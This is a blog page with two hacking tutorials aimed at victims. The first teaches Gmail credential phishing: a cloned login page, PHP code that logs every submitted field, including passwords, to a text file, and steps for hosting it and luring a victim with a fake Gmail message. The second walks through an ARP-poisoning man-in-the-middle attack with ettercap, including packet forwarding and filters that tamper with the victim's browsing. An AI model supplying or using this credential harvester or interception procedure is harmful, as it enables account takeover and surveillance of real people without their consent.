HACK TRACK

HACK TRACK
Gear yourself up....

Wednesday 29 August 2012

GMAIL HACKING


I Am Going Teach How To Hack To Hack GMAIL Account Through A Technique Called Pishing Technique.

 At First We Need 3 Files
1. Index.html
2. Mail.php
3. Log.txt

 (1)

 To Get Index.html File

 ----->First Go To "www.gmail.com" and right click on it
----->Select "View Source Code"
----->Copy All Code And Paste In Notepad
----->Search A Word In Code For "Action"
----->Beside The Word Action A Link Is Present In Qoutations, Delete All Link In Qoutations
----->Instead Type mail.php In The Qoutations
----->Save It As index.html

 (2)

 To Get Mail.php File

 ---->Copy The Following Programm And Paste It in Notepad
---->Save It as mail.php

 <?php
header ('Location: http://www.gmail.com/');
$handle = fopen("log.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

 (3)

 Finally The 3rd File
----->It is a Empty Notepad File
----->Save It As log.txt

 That's All We Got All 3 Files

 Upload These 3 Files Into Your Website

 No Need To Worry About Website There Are Many Free WebHosting Sites To Create Free Website

 Eg: www.000webhost.com

 ----->Create Your Website And Open Your Cpanel
----->Open File Manager
----->Upload These 3 Files In Public_html Floder
----->That's All

 Then Finally To Attack We Need a Pishing Link

 Then Your Pishing Link Will Be

 www.example.com/index.html

 Send The Pishing Link To Ur Victim As Gmail Has Send Mail

 If He Uses the Link The Password And Id Will Be Saved To Log.txt
File In Ur Website

 To View It
----->Open Cpanel Of Ur Website And Open Ur Filemanger
----->Open Public_html Folder
----->click Log.txt file
----->Search For Word Pass
----->There U Go U Will Find Password Beside It The Id Will Be There

 This Technique Can Be Used For Any Website Hacking
Posted by at 1 comment:
Labels:

ARP POISONING


MAN IN THE MIDDLE ATTACK PROCESS:

 For Doing This You Need BackTrack Operating System Installed In Your Virtual Box...

 Open Back Track Operating System In Virtual Box..

 The Default UserName is  "root"  And Password Is  "toor"

 ------------------------------------------------------------------------------------------------------------

 STEP 1:
 OPen The Root Teriminal(Comand Prompt) in Bt(Back Track)

    Type "ettercap -G" And Hit Enter
   It Opens Ettercap Software
   Open Internet Connections From TaskBar Menu
   Open Konquer Browser
   Open Path In Folder     "root/etc"
   Search The File "etter.conf" And Open It

   Search For Word  "Privs" And Below That   (MAKE THEM BOTH EQUAL TO ZERO)
      ec_uid=0
      ec_gid=0
   
   Search For Word  "Linux"
   In The Sentence  "# If You Use Iptables"  Remove  #

    save It....

 -----------------------------------------------------------------------------------------------------------

 STEP 2:

    Now Open "sysctl.conf"  File
   Search For The Line "# The Next Line To Enable Packet Forwarding For IPV4"
   Remove # From The Line

    Below It Another Line Is Present "# net.ipv4.ip_forward=1"
   Remove # From The Line

 ------------------------------------------------------------------------------------------------------------

 STEP 3:

      Go To Ettercap
     Open    Sniff------->Unified Sniffing
     Select The Interface And Click Ok

      Click    (1)  Start-------->start Sniffing
                 (2)  Hosts------->scan For Hosts

      To See The List Of Hosts
      Click   Hosts--------->Hosts  List

      Select The Ip Address Of Victim 1In the List And  Click "Add Target 1"
     Select The Ip Address Of Victim 2 In The List and Click "Add Target 2"

      Goto  "MITM" Option In The Menu Bar Of Ettercap
     Click "Arp Poisoning"
     Select "Sniff Remote Connections" And Press Ok
   
     ARP Replys Will be sent To The Victims

      To See That  Open Teriminal(Command Prompt)  And Type  "Wireshark"
      And Hit Enter
   
     You Can See The Arp Packets Are Sending To Victims..........
------------------------------------------------------------------------------------------------------------

     To Check Whether It Is Working Or Not
   
    Goto   Plugins---------->Manage Plugins
    Click "chk_poison" To Check Poison
     It Will Show The Poison Is Working Are Not

 ------------------------------------------------------------------------------------------------------------

 If U want Any Changes In The Victims Browser

 Goto Path  "Root/usr/share/ettercap/etter.filter.examples"

 And Open That File And Copy One Example Of It

 And Paste It In Any Empty Document And Save It As "Filename.filter"

 Compile The File "Filename.filter" In The Teriminal With Command  "Filename.filter -O NewFileName"

 Then It Produce a New File

 Open Ettercap And Open The Option "Filters"

 Open "Load Filter" And Select and Browse The Compiled File Of Filter and Hit Ok

 Now If The Victim Opens Any Website In His Browser The Images In The Website Will Be Appeared As any Image Prescribed In The Filter (The Link Of The Image In The Filter).

                            ---------THE END---------
Posted by at No comments:
Labels:
Subscribe to: Posts (Atom)